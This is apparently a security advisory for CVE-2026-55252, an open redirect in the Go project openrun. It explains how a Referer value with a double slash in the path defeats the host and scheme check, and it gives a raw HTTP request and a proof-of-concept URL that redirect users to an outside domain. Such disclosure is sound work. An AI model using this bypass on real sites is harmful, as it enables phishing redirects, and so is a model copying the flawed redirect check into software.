PT-2026-57044 · Go · Github.Com/Openrundev/Openrun
Publicado
2026-07-09
·
Atualizado
2026-07-09
·
CVE-2026-55252
CVSS v4.0
5.1
Média
| Vetor | AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N |
Summary
The restrictions on redirect URLs in
openrun can be bypassed by attackers, leading to open redirect attacks.Details
In the current project, the referrer header value is used for subsequent redirects, so there is currently a validation for this redirect value. The current validation logic requires that the host and schema of the redirect URL be the same as the current website's URL, and finally, the path part is used for redirection. This check seems robust, but it can still be bypassed by attackers.
Here's the problem: Assuming the current website is
http://127.0.0.1:25222/, if the attacker passes in a redirect URL of http://127.0.0.1:25222//fushuling.com, its host and schema are obviously the same as the current website, thus bypassing the verification. However, the issue lies in the final redirect URL, which is the path part of the URL, i.e., //fushuling.com.Browsers automatically complete the HTTP header for URLs starting with
//, ultimately successfully bypassing the restriction and redirecting to the external address http://fushuling.com.This vulnerable behavior was successfully reproduced locally. Normally, specifying an external address directly will be blocked, so it will not redirect.
However, if the redirect URL is
http://127.0.0.1:25222//fushuling.com, the existing validation logic is bypassed, and the Location header is successfully set to //fushuling.com.POST /redirecttest/abc/frag HTTP/1.1
Host: 127.0.0.1:25222
Referer: http://127.0.0.1:25222//fushuling.com
Cache-Control: max-age=0
sec-ch-ua: "Not(A:Brand";v="24", "Chromium";v="122"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.57 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
The user was then successfully redirected to the external address
http://fushuling.com.PoC
http://127.0.0.1:25222//fushuling.comImpact
Open Redirect
Correção
Open Redirect
Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾
Enumeração de Fraquezas
Identificadores relacionados
Produtos afetados
Github.Com/Openrundev/Openrun